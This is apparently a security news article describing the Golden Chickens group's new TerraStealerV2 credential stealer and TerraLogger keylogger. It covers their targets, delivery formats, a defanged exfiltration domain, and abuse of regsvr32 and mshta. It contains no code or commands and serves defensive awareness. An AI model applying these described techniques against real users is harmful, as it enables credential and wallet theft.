The cybercriminal group known as Golden Chickens, also referred to as Venom Spider, has introduced two new malware variants: TerraStealerV2 and TerraLogger. These developments indicate the group’s ongoing efforts to enhance and diversify their malicious toolkit.
Golden Chickens has been active since at least 2018, operating under a Malware-as-a-Service (MaaS) model. They offer a suite of malicious tools to other cybercriminals, enabling a wide range of attacks without the need for extensive technical expertise. Their portfolio includes notable malware such as More_eggs, TerraLoader, and VenomLNK.
TerraStealerV2 is designed to harvest sensitive information from victims’ systems. It targets browser credentials, cryptocurrency wallet data, and browser extension information. The malware is distributed through various formats, including executable files (EXEs), dynamic-link libraries (DLLs), Windows Installer packages (MSI), and shortcut (LNK) files. In each case, the stealer payload is delivered as an OCX (OLE Control Extension) file retrieved from an external domain, such as wetransfers[.]io.
Once executed, TerraStealerV2 focuses on extracting data from the Chrome browser’s ‘Login Data’ database to steal credentials. However, it does not bypass Application Bound Encryption (ABE) protections introduced in Chrome updates after July 2024. This limitation suggests that the malware’s code may be outdated or still under development. The stolen data is exfiltrated to both Telegram and the domain wetransfers[.]io. To evade detection, TerraStealerV2 leverages trusted Windows utilities, such as regsvr32.exe and mshta.exe.
TerraLogger, the second new tool, is a standalone keylogger designed to record keystrokes. It employs a common low-level keyboard hook to capture user inputs and writes the logs to local files. Notably, TerraLogger does not include functionality for data exfiltration or command-and-control (C2) communication. This absence suggests that the tool is either in early development stages or intended to be used in conjunction with other malware within the Golden Chickens MaaS ecosystem.
The current state of TerraStealerV2 and TerraLogger indicates that both tools are under active development and do not yet exhibit the level of stealth typically associated with mature Golden Chickens malware. Given the group’s history of developing malware for credential theft and access operations, it is likely that these capabilities will continue to evolve.
The emergence of TerraStealerV2 and TerraLogger underscores the persistent threat posed by Golden Chickens and similar cybercriminal groups. Their ability to develop and deploy sophisticated malware highlights the importance of robust cybersecurity measures. Organizations and individuals must remain vigilant, regularly update their software, and employ comprehensive security solutions to protect against such evolving threats.
